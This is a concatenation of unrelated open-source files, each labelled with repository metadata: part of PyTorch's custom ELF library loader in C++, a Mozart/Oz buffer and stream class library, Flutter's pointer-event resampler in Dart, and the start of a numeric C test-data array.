R_X86_64_64: case R_X86_64_GLOB_DAT: { const Elf64_Addr result = *sym_addr + reloc.r_addend; *static_cast<Elf64_Addr*>(rel_target) = result; } break; case R_X86_64_RELATIVE: { // In practice, r_sym is always zero, but if it weren't, the linker // would still look up the referenced symbol (and abort if the symbol // isn't found), even though it isn't used. const Elf64_Addr result = load_bias_ + reloc.r_addend; *static_cast<Elf64_Addr*>(rel_target) = result; } break; case R_X86_64_32: { const Elf32_Addr result = *sym_addr + reloc.r_addend; *static_cast<Elf32_Addr*>(rel_target) = result; } break; case R_X86_64_PC32: { const Elf64_Addr target = *sym_addr + reloc.r_addend; const Elf64_Addr base = reinterpret_cast<Elf64_Addr>(rel_target); const Elf32_Addr result = target - base; *static_cast<Elf32_Addr*>(rel_target) = result; } break; default: DEPLOY_ERROR("unknown reloc type {} in \"{}\"", r_type, name_.c_str()); break; } } void relocate() { for (const auto i : c10::irange(dyninfo_.n_rela_)) { relocate_one(dyninfo_.rela_[i]); } for (const auto i : c10::irange(dyninfo_.n_plt_rela_)) { relocate_one(dyninfo_.plt_rela_[i]); } } void initialize() { call_function(dyninfo_.init_func_); for (const auto i : c10::irange(dyninfo_.n_init_array_)) { call_function(dyninfo_.init_array_[i]); } initialized_ = true; } void finalize() { for (size_t i = dyninfo_.n_fini_array_; i > 0; --i) { call_function(dyninfo_.fini_array_[i - 1]); } call_function(dyninfo_.fini_func_); } void register_debug_info() { // std::cout << "target modules add " << name_.c_str() << "\n"; // std::cout << "target modules load -f " << name_.c_str() << " -s " // << std::hex << "0x" << load_bias_ << "\n"; __deploy_module_info.name = name_.c_str(); __deploy_module_info.file_addr = (Elf64_Addr)contents_.data(); __deploy_module_info.file_size = contents_.size(); __deploy_module_info.load_bias = load_bias_; // debugger script sets a breakpoint on this function, // then reads __deploy_module_info to issue the target module commands. __deploy_register_code(); } // remove the extra write flags from read-only sections void protect() { for (const auto& fixup : fixup_prot_) { fixup(); } } void load() override { check_library_format(); reserve_address_space(); load_segments(); read_dynamic_section(); relocate(); protect(); __register_frame(eh_frame_); eh_frame_registered_ = true; register_debug_info(); initialize(); } ~CustomLibraryImpl() override { // std::cout << "LINKER IS UNLOADING: " << name_ << "\n"; if (initialized_) { finalize(); } if (eh_frame_registered_) { __deregister_frame(eh_frame_); } if (mapped_library_) { munmap(mapped_library_, mapped_size_); } } void call_function(linker_dtor_function_t f) { if (f == nullptr || (int64_t)f == -1) return; f(); } void call_function(linker_ctor_function_t f) { if (f == nullptr || (int64_t)f == -1) return; f(argc_, argv_, environ); } at::optional<Elf64_Addr> sym(const char* name) const override { return dyninfo_.sym(name); } at::optional<TLSIndex> tls_sym(const char* name) const override { auto r = dyninfo_.sym(name); if (r) { return TLSIndex{module_id(), *r}; } return at::nullopt; } void* tls_addr(size_t offset) { // this was a TLS entry for one of our modules, so we use pthreads to // emulate thread local state. void* start = pthread_getspecific(tls_key_); if (!start) { auto tls_mem = new TLSMemory(shared_from_this(), tls_mem_size_); __cxa_thread_atexit_impl(delete_TLSMemory, tls_mem, &__dso_handle); start = tls_mem->mem_; memcpy(start, tls_initalization_image_, tls_file_size_); memset( (void*)((const char*)start + tls_file_size_), 0, tls_mem_size_ - tls_file_size_); pthread_setspecific(tls_key_, start); } return (void*)((const char*)start + offset); } private: MemFile contents_; const char* data_ = nullptr; const Elf64_Ehdr* header_ = nullptr; const Elf64_Phdr* program_headers_ = nullptr; const EH_Frame_HDR* eh_frame_hdr_ = nullptr; void* eh_frame_ = nullptr; size_t n_program_headers_ = 0; void* mapped_library_ = nullptr; size_t mapped_size_ = 0; Elf64_Addr load_bias_ = 0; Elf64_Dyn* dynamic_ = nullptr; ElfDynamicInfo dyninfo_; std::string name_; int argc_ = 0; const char** argv_ = nullptr; bool initialized_ = false; bool eh_frame_registered_ = false; pthread_key_t tls_key_ = 0; void* tls_initalization_image_ = nullptr; size_t tls_file_size_ = 0; size_t tls_mem_size_ = 0; std::vector<std::shared_ptr<SymbolProvider>> symbol_search_path_; std::vector<std::function<void(void)>> fixup_prot_; }; std::shared_ptr<CustomLibrary> CustomLibrary::create( const char* filename, int argc, const char** argv) { return std::make_shared<CustomLibraryImpl>(filename, argc, argv); } static void* local__tls_get_addr(TLSIndex* idx) { if ((idx->module_id & TLS_LOCAL_FLAG) != 0) { return ((CustomLibraryImpl*)(idx->module_id & ~TLS_LOCAL_FLAG)) ->tls_addr(idx->offset); } return __tls_get_addr(idx); } } // namespace deploy } // namespace torch
C++
5
dllehr-amd/pytorch
torch/csrc/deploy/loader.cpp
[ "Intel" ]
%%% %%% Authors: %%% Konstantin Popov %%% %%% Copyright: %%% Konstantin Popov, 1997 %%% %%% Last change: %%% $Date$ by $Author$ %%% $Revision$ %%% %%% This file is part of Mozart, an implementation %%% of Oz 3 %%% http://www.mozart-oz.org %%% %%% See the file "LICENSE" or %%% http://www.mozart-oz.org/LICENSE.html %%% for information on usage and redistribution %%% of this file, and for a DISCLAIMER OF ALL %%% WARRANTIES. %%% %%% %%% %%% local GetHead GetTail Take CoreBufferClass NumBufferClass LimitedBufferClass in %% %% GetHead = {NewName} GetTail = {NewName} %% %% My version of 'List.take' - yields the empty list if N=0. %% (It accepts also malformed lists, but i don't care;) fun {Take Xs N} if N>0 then case Xs of X|Xr then X|{Take Xr N-1} else nil end else nil end end %% %% Core buffer. No limits and no suspensions - "pure logical"; class CoreBufferClass from MyClosableObject BatchObject prop locking %% attr Tail % where to put in; Head % where to discard; %% ... as "reinit" too; meth init local Start in lock Tail <- Start Head <- Start end end end meth close local T in T = @Tail MyClosableObject , close Head <- T T = nil end end %% meth enq(El) local NewTail in lock if MyClosableObject , isClosed($) then skip else @Tail = El|NewTail Tail <- NewTail end end end end meth deq(?El) local NewHead in lock @Head = El|NewHead Head <- NewHead end end end %% meth getFirstEl(?El) @Head = El|_ end %% meth !GetHead($) @Head end meth !GetTail($) @Tail end %% end %% %% The only addition is that its elements are numbered; class NumBufferClass from CoreBufferClass %% attr Size % %% ... as "reinit" too; meth init lock Size <- 0 CoreBufferClass , init end end meth close CoreBufferClass , close Size <- 0 end %% meth enq(El) lock CoreBufferClass , enq(El) Size <- @Size + 1 end end meth deq(?El) lock CoreBufferClass , deq(El) Size <- @Size - 1 end end %% meth getSize($) @Size end %% %% Yields a list of enqueued entries; meth getContent($) lock {Take (CoreBufferClass , GetHead($)) @Size} end end %% end %% %% This one can store only a limited number of elements. Requests %% that cannot be server at the moment are rejected; class LimitedBufferClass from NumBufferClass %% attr MaxSize % %% ... as "reinit" too; meth init(SizeIn) lock MaxSize <- SizeIn NumBufferClass , init end end %% meth getMaxSize($) @MaxSize end %% meth hasPlace($) lock NumBufferClass , getSize($) < @MaxSize end end %% meth isNotEmpty($) lock NumBufferClass , getSize($) > 0 end end %% meth enq(El $) lock if LimitedBufferClass , hasPlace($) then NumBufferClass , enq(El) true else false end end end %% meth getFirstEl(?El $) lock if LimitedBufferClass , isNotEmpty($) then CoreBufferClass , getFirstEl(El) true else false end end end %% %% Note that it can hold more elements than the MaxSize %% (because of 'resize'); meth deq(?El $) lock if LimitedBufferClass , isNotEmpty($) then NumBufferClass , deq(El) true else false end end end %% meth resize(NewMaxSize) MaxSize <- NewMaxSize end %% end %% %% Non-monotonic 'enq'/'deq' operations, plus 'waitElement': %% suspends until the stream becomes non-empty. Note that a %% subsequent 'deq' needs not to yield some element: it can be, %% e.g., already dequeued by some other agent. class BrowserStreamClass from NumBufferClass %% %% 'init'/'close' are inherited from 'NumBufferClass'; %% %% 'enq' is inherited from 'NumBufferClass' without changes. %% There is also 'getSize', but it does not seem to be %% necessary. %% meth deq(?Req $) lock if NumBufferClass , getSize($) > 0 then NumBufferClass , deq(Req) true else Req = InitValue false end end end %% %% Note that it does not block the object state; meth waitElement {Wait if MyClosableObject , isClosed($) then _ % forever; else CoreBufferClass , GetTail($) end} end %% end %% %% %% class BrowserBufferClass from Object.base prop locking %% feat CoreBuffer % carries enqueued entries; ToEnqueue % not-yet enqueued; ToDequeue % not-yet dequeued; %% meth init(MaxSizeIn) self.CoreBuffer = {New LimitedBufferClass init(MaxSizeIn)} self.ToEnqueue = {New NumBufferClass init} self.ToDequeue = {New NumBufferClass init} end %% meth close lock %% there are probably some suspended enq"s; if {self.ToEnqueue getSize($)} > 0 then L in L = {self.ToEnqueue getContent($)} {ForAll L proc {$ E} {E.discardAction} end} end %% ... deq"s? if {self.ToDequeue getSize($)} > 0 then L in L = {self.ToDequeue getContent($)} {ForAll L proc {$ E} {E.discardAction} end} end %% end end %% meth CheckDequeue lock if {self.CoreBuffer isNotEmpty($)} andthen {self.ToDequeue getSize($)} > 0 then Entry in %% process the first of them; Entry = {self.ToDequeue deq($)} Entry.elem = {self.CoreBuffer deq($ _)} {Entry.proceedAction} %% BrowserBufferClass , CheckDequeue end end end %% meth CheckEnqueue lock if {self.CoreBuffer hasPlace($)} andthen {self.ToEnqueue getSize($)} > 0 then Entry in Entry = {self.ToEnqueue deq($)} {self.CoreBuffer enq(Entry.elem _)} {Entry.proceedAction} %% BrowserBufferClass , CheckEnqueue end end end %% meth enq(El ProceedAction DiscardAction) lock if {self.CoreBuffer enq(El $)} then {ProceedAction} %% check whether we have some pending deq"s; BrowserBufferClass , CheckDequeue else ToEnqueueEntry in ToEnqueueEntry = toEnqueueEntry(elem: El proceedAction: ProceedAction discardAction: DiscardAction) %% {self.ToEnqueue enq(ToEnqueueEntry)} end end end %% meth getFirstEl(?El $) {self.CoreBuffer getFirstEl(El $)} end %% %% This is a kind of interesting: the 'ProceedAction' procedure %% may refer 'El', and when it is applied 'El' is instantiated %% too! This is similar to 'enq' but with the difference where %% 'El' comes from; %% %% The limitation is that "actions" cannot apply the 'self' %% (buffer) directly, i.e. without thread...end - this will %% lead to a deadlock. %% meth deq(?El ProceedAction DiscardAction) lock if {self.CoreBuffer deq(El $)} then {ProceedAction} %% BrowserBufferClass , CheckEnqueue else ToDequeueEntry in ToDequeueEntry = toDequeueEntry(elem: El proceedAction: ProceedAction discardAction: DiscardAction) %% {self.ToDequeue enq(ToDequeueEntry)} end end end %% meth getSize($) {self.CoreBuffer getSize($)} end %% meth resize(NewMaxSize) local CurrentMaxSize in lock CurrentMaxSize = {self.CoreBuffer getMaxSize($)} {self.CoreBuffer resize(NewMaxSize)} %% if NewMaxSize > CurrentMaxSize then BrowserBufferClass , CheckEnqueue else skip %% no special action when getting smaller; end end end end %% %% Throws away "to-be-{en,de}queued" requests; meth purgeSusps local P in lock %% P = proc {$ Entry} {Entry.discardAction} end {ForAll {self.ToDequeue getContent($)} P} {ForAll {self.ToEnqueue getContent($)} P} %% {self.ToDequeue init} {self.ToEnqueue init} end end end %% meth getContent($) {self.CoreBuffer getContent($)} end %% end %% end
Oz
5
Ahzed11/mozart2
lib/tools/browser/browser/bufsAndStreams.oz
[ "BSD-2-Clause" ]
// Copyright 2014 The Flutter Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. import 'dart:collection'; import 'events.dart'; /// A callback used by [PointerEventResampler.sample] and /// [PointerEventResampler.stop] to process a resampled `event`. typedef HandleEventCallback = void Function(PointerEvent event); /// Class for pointer event resampling. /// /// An instance of this class can be used to resample one sequence /// of pointer events. Multiple instances are expected to be used for /// multi-touch support. The sampling frequency and the sampling /// offset is determined by the caller. /// /// This can be used to get smooth touch event processing at the cost /// of adding some latency. Devices with low frequency sensors or when /// the frequency is not a multiple of the display frequency /// (e.g., 120Hz input and 90Hz display) benefit from this. /// /// The following pointer event types are supported: /// [PointerAddedEvent], [PointerHoverEvent], [PointerDownEvent], /// [PointerMoveEvent], [PointerCancelEvent], [PointerUpEvent], /// [PointerRemovedEvent]. /// /// Resampling is currently limited to event position and delta. All /// pointer event types except [PointerAddedEvent] will be resampled. /// [PointerHoverEvent] and [PointerMoveEvent] will only be generated /// when the position has changed. class PointerEventResampler { // Events queued for processing. final Queue<PointerEvent> _queuedEvents = Queue<PointerEvent>(); // Pointer state required for resampling. PointerEvent? _last; PointerEvent? _next; Offset _position = Offset.zero; bool _isTracked = false; bool _isDown = false; int _pointerIdentifier = 0; int _hasButtons = 0; PointerEvent _toHoverEvent( PointerEvent event, Offset position, Offset delta, Duration timeStamp, int buttons, ) { return PointerHoverEvent( timeStamp: timeStamp, kind: event.kind, device: event.device, position: position, delta: delta, buttons: event.buttons, obscured: event.obscured, pressureMin: event.pressureMin, pressureMax: event.pressureMax, distance: event.distance, distanceMax: event.distanceMax, size: event.size, radiusMajor: event.radiusMajor, radiusMinor: event.radiusMinor, radiusMin: event.radiusMin, radiusMax: event.radiusMax, orientation: event.orientation, tilt: event.tilt, synthesized: event.synthesized, embedderId: event.embedderId, ); } PointerEvent _toMoveEvent( PointerEvent event, Offset position, Offset delta, int pointerIdentifier, Duration timeStamp, int buttons, ) { return PointerMoveEvent( timeStamp: timeStamp, pointer: pointerIdentifier, kind: event.kind, device: event.device, position: position, delta: delta, buttons: buttons, obscured: event.obscured, pressure: event.pressure, pressureMin: event.pressureMin, pressureMax: event.pressureMax, distanceMax: event.distanceMax, size: event.size, radiusMajor: event.radiusMajor, radiusMinor: event.radiusMinor, radiusMin: event.radiusMin, radiusMax: event.radiusMax, orientation: event.orientation, tilt: event.tilt, platformData: event.platformData, synthesized: event.synthesized, embedderId: event.embedderId, ); } PointerEvent _toMoveOrHoverEvent( PointerEvent event, Offset position, Offset delta, int pointerIdentifier, Duration timeStamp, bool isDown, int buttons, ) { return isDown ? _toMoveEvent( event, position, delta, pointerIdentifier, timeStamp, buttons) : _toHoverEvent(event, position, delta, timeStamp, buttons); } Offset _positionAt(Duration sampleTime) { // Use `next` position by default. double x = _next?.position.dx ?? 0.0; double y = _next?.position.dy ?? 0.0; final Duration nextTimeStamp = _next?.timeStamp ?? Duration.zero; final Duration lastTimeStamp = _last?.timeStamp ?? Duration.zero; // Resample if `next` time stamp is past `sampleTime`. if (nextTimeStamp > sampleTime && nextTimeStamp > lastTimeStamp) { final double interval = (nextTimeStamp - lastTimeStamp).inMicroseconds.toDouble(); final double scalar = (sampleTime - lastTimeStamp).inMicroseconds.toDouble() / interval; final double lastX = _last?.position.dx ?? 0.0; final double lastY = _last?.position.dy ?? 0.0; x = lastX + (x - lastX) * scalar; y = lastY + (y - lastY) * scalar; } return Offset(x, y); } void _processPointerEvents(Duration sampleTime) { final Iterator<PointerEvent> it = _queuedEvents.iterator; while (it.moveNext()) { final PointerEvent event = it.current; // Update both `last` and `next` pointer event if time stamp is older // or equal to `sampleTime`. if (event.timeStamp <= sampleTime || _last == null) { _last = event; _next = event; continue; } // Update only `next` pointer event if time stamp is more recent than // `sampleTime` and next event is not already more recent. final Duration nextTimeStamp = _next?.timeStamp ?? Duration.zero; if (nextTimeStamp < sampleTime) { _next = event; break; } } } void _dequeueAndSampleNonHoverOrMovePointerEventsUntil( Duration sampleTime, Duration nextSampleTime, HandleEventCallback callback, ) { Duration endTime = sampleTime; // Scan queued events to determine end time. final Iterator<PointerEvent> it = _queuedEvents.iterator; while (it.moveNext()) { final PointerEvent event = it.current; // Potentially stop dispatching events if more recent than `sampleTime`. if (event.timeStamp > sampleTime) { // Definitely stop if more recent than `nextSampleTime`. if (event.timeStamp >= nextSampleTime) { break; } // Update `endTime` to allow early processing of up and removed // events as this improves resampling of these events, which is // important for fling animations. if (event is PointerUpEvent || event is PointerRemovedEvent) { endTime = event.timeStamp; continue; } // Stop if event is not move or hover. if (event is! PointerMoveEvent && event is! PointerHoverEvent) { break; } } } while (_queuedEvents.isNotEmpty) { final PointerEvent event = _queuedEvents.first; // Stop dispatching events if more recent than `endTime`. if (event.timeStamp > endTime) { break; } final bool wasTracked = _isTracked; final bool wasDown = _isDown; final int hadButtons = _hasButtons; // Update pointer state. _isTracked = event is! PointerRemovedEvent; _isDown = event.down; _hasButtons = event.buttons; // Position at `sampleTime`. final Offset position = _positionAt(sampleTime); // Initialize position if we are starting to track this pointer. if (_isTracked && !wasTracked) { _position = position; } // Current pointer identifier. final int pointerIdentifier = event.pointer; // Initialize pointer identifier for `move` events. // Identifier is expected to be the same while `down`. assert(!wasDown || _pointerIdentifier == pointerIdentifier); _pointerIdentifier = pointerIdentifier; // Skip `move` and `hover` events as they are automatically // generated when the position has changed. if (event is! PointerMoveEvent && event is! PointerHoverEvent) { // Add synthetics `move` or `hover` event if position has changed. // Note: Devices without `hover` events are expected to always have // `add` and `down` events with the same position and this logic will // therefore never produce `hover` events. if (position != _position) { final Offset delta = position - _position; callback(_toMoveOrHoverEvent(event, position, delta, _pointerIdentifier, sampleTime, wasDown, hadButtons)); _position = position; } callback(event.copyWith( position: position, delta: Offset.zero, pointer: pointerIdentifier, timeStamp: sampleTime, )); } _queuedEvents.removeFirst(); } } void _samplePointerPosition( Duration sampleTime, HandleEventCallback callback, ) { // Position at `sampleTime`. final Offset position = _positionAt(sampleTime); // Add `move` or `hover` events if position has changed. final PointerEvent? next = _next; if (position != _position && next != null) { final Offset delta = position - _position; callback(_toMoveOrHoverEvent(next, position, delta, _pointerIdentifier, sampleTime, _isDown, _hasButtons)); _position = position; } } /// Enqueue pointer `event` for resampling. void addEvent(PointerEvent event) { _queuedEvents.add(event); } /// Dispatch resampled pointer events for the specified `sampleTime` /// by calling [callback]. /// /// This may dispatch multiple events if position is not the only /// state that has changed since last sample. /// /// Calling [callback] must not add or sample events. /// /// Positive value for `nextSampleTime` allow early processing of /// up and removed events. This improves resampling of these events, /// which is important for fling animations. void sample( Duration sampleTime, Duration nextSampleTime, HandleEventCallback callback, ) { _processPointerEvents(sampleTime); // Dequeue and sample pointer events until `sampleTime`. _dequeueAndSampleNonHoverOrMovePointerEventsUntil(sampleTime, nextSampleTime, callback); // Dispatch resampled pointer location event if tracked. if (_isTracked) { _samplePointerPosition(sampleTime, callback); } } /// Stop resampling. /// /// This will dispatch pending events by calling [callback] and reset /// internal state. void stop(HandleEventCallback callback) { while (_queuedEvents.isNotEmpty) { callback(_queuedEvents.removeFirst()); } _pointerIdentifier = 0; _isDown = false; _isTracked = false; _position = Offset.zero; _next = null; _last = null; } /// Returns `true` if a call to [sample] can dispatch more events. bool get hasPendingEvents => _queuedEvents.isNotEmpty; /// Returns `true` if pointer is currently tracked. bool get isTracked => _isTracked; /// Returns `true` if pointer is currently down. bool get isDown => _isDown; }
Dart
5
Mayb3Nots/flutter
packages/flutter/lib/src/gestures/resampler.dart
[ "BSD-3-Clause" ]
static const uint16_t in_com1[2209] = { 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0xb7d2, 0xb41e, 0xb836, 0xa713, 0x3505, 0x3239, 0x30a9, 0xb61d, 0xb56d, 0xb7f3, 0x2d1d, 0x3590, 0x2f3e, 0x1ad2, 0xb113, 0x3688, 0xacfd, 0xb25b, 0xb124, 0x3512, 0x2890, 0xadd0, 0x328c, 0xb16c, 0xb0f6, 0xb46a, 0xae1e, 0x38b2, 0xaf43, 0x3142, 0xbaf5, 0xb052, 0x2b74, 0xb275, 0x395e, 0x35fd, 0xb6fb, 0xb0fd, 0x267c, 0x2853, 0xaefb, 0xaa93, 0xb610, 0xb37f, 0xb4d6, 0x301a, 0xa1ef, 0x37ed, 0x318c, 0xae09, 0x3015, 0xb808, 0x2579, 0xb476, 0x3602, 0xb6e3, 0xb111, 0x2846, 0xb075, 0xa077, 0x387a, 0x334d, 0x296d, 0x32b1, 0x34c7, 0x340d, 0x320d, 0x3455, 0xaeeb, 0xa804, 0xb05c, 0xb19b, 0xa41f, 0x30b5, 0x304f, 0x30fd, 0xadb8, 0x34ad, 0xa87d, 0xb395, 0x3240, 0xb70b, 0x3225, 0xb491, 0xb29d, 0x34a4, 0xa262, 0x326e, 0x324d, 0xa8fc, 0x3639, 0x315b, 0xab3a, 0x363d, 0xb477, 0xaf9d, 0xac47, 0xb844, 0xb6eb, 0xb5ae, 0xb0f9, 0xb727, 0x31ba, 0x37ac, 0xb417, 0x327d, 0xac86, 0xb4f6, 0x22d7, 0xb13f, 0x3016, 0x2d02, 0x342d, 0xb75c, 0xb53f, 0x32c8, 0xb06d, 0x1e5a, 0x38d7, 0xb7b9, 0x2d90, 0x3492, 0xb6e7, 0x2f72, 0xac8b, 0xafa9, 0xb1eb, 0x8f5e, 0xa3b0, 0xa344, 0xaa30, 0xb3a7, 0x37e3, 0x33b2, 0xb3e1, 0xb8af, 0xb4d1, 0x3535, 0xb5c2, 0xa9c9, 0xb4b3, 0x245a, 0xad00, 0xb7ea, 0xadd0, 0xae6b, 0xb55e, 0xad5a, 0x3a11, 0xaff5, 0x31bb, 0xb3aa, 0x24f2, 0x37c1, 0xa9ec, 0x32d7, 0x33a8, 0xaa8b, 0xaff2, 0xb417, 0xacdd, 0xb540, 0xae84, 0xb022, 0xaf0b, 0xb3dc, 0xb3bd, 0x33fa, 0xa5e6, 0xb39e, 0xb068, 0xb42f, 0x28eb, 0xaf8b, 0xac2a, 0xb8ac, 0x3548, 0xb763, 0x35a9, 0x30b1, 0x3171, 0xb8aa, 0xac4c, 0x3095, 0x2cda, 0x27ed, 0xaf3c, 0xb5d5, 0x3417, 0x383b, 0x30c2, 0x2d3b, 0x22a2, 0x2fb4, 0x24cf, 0xb4bc, 0xaaa9, 0x30bb, 0xb6b7, 0x2d0e, 0xae8c, 0xb5ef, 0x35dd, 0x3480, 0x1bad, 0x3811, 0x3b47, 0x340d, 0xb137, 0x384c, 0x38cf, 0xb84c, 0x2f0b, 0x2b73, 0xae02, 0x2fad, 0x2e46, 0x334a, 0xa75b, 0x3341, 0x2bdd, 0x2637, 0xb74d, 0x2803, 0x3155, 0xaf0b, 0x9993, 0x26bf, 0xb66c, 0xb470, 0x3558, 0x22ef, 0x33e7, 0x297f, 0x2c08, 0xb611, 0x19ef, 0xb445, 0xb671, 0x2bc3, 0xb59a, 0xb3e5, 0x257e, 0x2c34, 0x2e34, 0xb468, 0x2eca, 0x351f, 0xb462, 0xaa87, 0x303d, 0x35af, 0xa190, 0x33ce, 0x38ad, 0x28cd, 0x24fc, 0x34ed, 0xb4bf, 0x2e26, 0xafcc, 0xb48a, 0x34d2, 0x2d7c, 0xb1bd, 0xb405, 0x3101, 0x9ef1, 0x340b, 0xaabc, 0xb394, 0xb36b, 0xb083, 0xb4a7, 0x2791, 0x3678, 0x39a7, 0x3476, 0x312f, 0x2ca9, 0x35e5, 0xac13, 0xb473, 0x3466, 0x3329, 0xb224, 0xb8d7, 0xb220, 0xabc5, 0x3596, 0x314e, 0x3173, 0xac3e, 0xb81d, 0xb1a0, 0x32c9, 0xb49d, 0xac21, 0xaad1, 0x364b, 0x306e, 0x2a9c, 0xaeae, 0xb33c, 0xb2ae, 0x3430, 0x391d, 0xb5ff, 0xb4e2, 0xae83, 0xb765, 0x37c9, 0x2e83, 0xa551, 0x2b31, 0xb934, 0x301c, 0xad4f, 0x2e09, 0xb70b, 0x3781, 0x3813, 0xab4e, 0x2e0a, 0xb0bd, 0xad74, 0x336b, 0xab2a, 0xb459, 0x37b4, 0x9e14, 0x2950, 0xb1a5, 0x90a7, 0x3158, 0x3433, 0x30ea, 0xa8b8, 0x2d53, 0x346c, 0x30bc, 0xb416, 0x2429, 0xb698, 0x3157, 0x3478, 0xada3, 0xb10b, 0x229d, 0x3564, 0xb46f, 0xb443, 0x2e65, 0x2a0a, 0x350d, 0x32a8, 0x2033, 0xb020, 0x35b4, 0x2415, 0x2c76, 0xa7c8, 0xb430, 0x29e0, 0x30be, 0x30a4, 0x3033, 0xb541, 0xa4ed, 0x276a, 0x3322, 0xb65d, 0xb1a0, 0xb842, 0x351a, 0xb0a3, 0xb43e, 0x23df, 0x3209, 0xaf98, 0x3181, 0xb017, 0xb4c7, 0xb79e, 0xb3af, 0x2dac, 0x18c1, 0xb581, 0xb52a, 0xb398, 0x1e84, 0x2cff, 0x3757, 0x3575, 0xb441, 0x3504, 0x3128, 0xac63, 0x349a, 0xb005, 0xb41c, 0x3819, 0x3713, 0x2c5a, 0xa8e7, 0xb615, 0x380c, 0x3359, 0x3148, 0xfbd, 0x298e, 0xa93e, 0x3444, 0xa88c, 0x344a, 0xb3c3, 0x2dc6, 0x2f68, 0xb05d, 0xb11c, 0x318e, 0x2a41, 0x3447, 0x30ba, 0x9779, 0xaf0c, 0x3110, 0x348a, 0xb172, 0x3290, 0x9d48, 0xae16, 0x299b, 0xaec2, 0xa7a3, 0x35ba, 0x34bf, 0xb145, 0xad53, 0xb3fa, 0xb42f, 0xb03b, 0x2374, 0xb290, 0x3539, 0x366f, 0xb359, 0x36d7, 0x2da9, 0xa63e, 0x3503, 0x347a, 0xb49f, 0xb29d, 0x2b66, 0x2da1, 0xb80b, 0xad07, 0xaaea, 0x3867, 0xb141, 0xb17c, 0xb6e5, 0xb656, 0x3901, 0x3013, 0x2d85, 0xb001, 0xb0a0, 0xad1d, 0x2d41, 0x361d, 0x219d, 0xa3b5, 0xae42, 0xa856, 0xb550, 0xb444, 0xb5d6, 0x3031, 0x24b1, 0x3133, 0xb0a0, 0x2f80, 0x353e, 0x29a0, 0x9955, 0x3124, 0xb4f8, 0xb6c3, 0x3400, 0xb4e5, 0xb657, 0xacd6, 0x1f42, 0x2955, 0x3310, 0xa933, 0x358d, 0xb759, 0x35fc, 0x340b, 0xb206, 0xb925, 0xb6e3, 0xb003, 0xb7f5, 0xad43, 0x33e4, 0xab8a, 0x3846, 0x3aac, 0x26af, 0x2785, 0x3a39, 0xb2ea, 0xb9b4, 0xb6a8, 0x2b0f, 0xb55c, 0x367b, 0x381c, 0xa01f, 0x2e37, 0x317b, 0x2cb6, 0xb4b9, 0xb316, 0x373c, 0xb8cc, 0x3921, 0xade7, 0x3471, 0x26fc, 0x30dc, 0x1ca9, 0xb81e, 0x302a, 0x2984, 0xae67, 0x3772, 0xb966, 0x353f, 0xa247, 0x25db, 0x335e, 0x30b9, 0xb136, 0x3617, 0xb491, 0xb56d, 0x384e, 0xb6f7, 0xb2ac, 0x3659, 0xaee0, 0x332d, 0xb090, 0x34bd, 0x3720, 0x352e, 0xb2b1, 0xb178, 0x3775, 0xa4fc, 0x3003, 0xb06b, 0x2e0b, 0x3166, 0x30e2, 0x349f, 0xa849, 0x2fec, 0x31d1, 0xb7b5, 0x3039, 0xae07, 0x3013, 0x2d47, 0x297f, 0xb615, 0xa60d, 0x38fa, 0xad23, 0x269b, 0x30ea, 0x37d4, 0xb1b2, 0x348b, 0x330c, 0xaa66, 0xa95e, 0x32d9, 0xb648, 0xb32b, 0x333f, 0x372d, 0xace6, 0xaf4c, 0xb216, 0x2f26, 0x3004, 0xb107, 0x28a4, 0x28f7, 0x3066, 0xaa11, 0xaea1, 0xac7e, 0xb81e, 0xa78b, 0x30dc, 0x2cc1, 0x3104, 0xb542, 0x30ac, 0x3598, 0x2caf, 0xb2e2, 0xa8cf, 0x2c1d, 0xb72e, 0xa683, 0x2c98, 0x3309, 0xaead, 0xb889, 0x32c5, 0x3811, 0xb0f0, 0x3212, 0x29e7, 0xad19, 0x3089, 0xb02b, 0x2019, 0x20f7, 0xac5f, 0x35f7, 0x2c06, 0x2b8d, 0x2b7f, 0xaccc, 0xaea0, 0x1abe, 0xa372, 0x378c, 0x3030, 0x2c40, 0xb577, 0xb504, 0x35e3, 0x37fc, 0xb1ed, 0x2876, 0xb21e, 0x3869, 0x34e1, 0x34ed, 0xb0f2, 0xb6cf, 0xa8da, 0x37a8, 0x3601, 0xb219, 0xaf1f, 0x3567, 0x352f, 0x29b1, 0x3532, 0x2c98, 0xb1d5, 0x34dd, 0xa8b4, 0x3635, 0xad00, 0x32d6, 0x34dd, 0xb3b9, 0xb317, 0xafec, 0x348c, 0xac43, 0xa99f, 0x25dc, 0xab5f, 0xb4e9, 0x30ba, 0xb8f0, 0xb5f7, 0x2e0f, 0x345c, 0x3470, 0xb896, 0xb2a8, 0x2e4b, 0xaed7, 0x2838, 0xb580, 0xb2d2, 0x2c6c, 0x377e, 0xaa88, 0x392b, 0xb716, 0xa881, 0x3236, 0xa720, 0x36df, 0x37eb, 0xb49f, 0x2d57, 0x3403, 0x312e, 0x2ddd, 0x2de9, 0xb3fe, 0x39e1, 0xa832, 0x3200, 0xad59, 0xb2df, 0xae70, 0x3858, 0xb1bb, 0x2ccc, 0x2a84, 0x355a, 0xa533, 0x2c09, 0x2c27, 0x9c10, 0x30aa, 0x35fa, 0xb2ea, 0xa9ad, 0xb253, 0x33fa, 0xb5ee, 0x3133, 0x3408, 0xb5b6, 0x2c4d, 0xb408, 0x305a, 0x3a93, 0x2c03, 0x3402, 0x32ea, 0xb057, 0x3039, 0x2886, 0xb498, 0x33e6, 0xb640, 0xaa05, 0xaa47, 0x3713, 0xb2ff, 0xa773, 0xb4c8, 0x2914, 0xb03a, 0xb8a2, 0x3230, 0x2811, 0x3514, 0x34a2, 0xadcd, 0xb518, 0x2b7c, 0xae45, 0xb6db, 0xb4c8, 0xa967, 0xb363, 0xacd5, 0x2e68, 0x24a8, 0x2d37, 0x324e, 0x2f66, 0x1f26, 0x9ad2, 0x2ed6, 0xb432, 0x321a, 0x383e, 0x3213, 0xb8bf, 0x304a, 0xb6a1, 0xb59d, 0xb41b, 0x2da3, 0xb6a1, 0xadc9, 0xb92a, 0xacdb, 0x31fd, 0x3369, 0xb3fe, 0xb220, 0xa529, 0xac82, 0xa3a8, 0x300a, 0xb578, 0xb4d3, 0xb75f, 0x3272, 0x9c08, 0xb082, 0xb086, 0xb0ba, 0xa0eb, 0xb605, 0x2db2, 0xb897, 0x94ca, 0x35a5, 0xae66, 0x2863, 0x3053, 0xacf8, 0x2bcf, 0x34c3, 0x32b4, 0x35e9, 0x3545, 0xb56c, 0xb1e4, 0x322e, 0xafc9, 0xb88b, 0x3844, 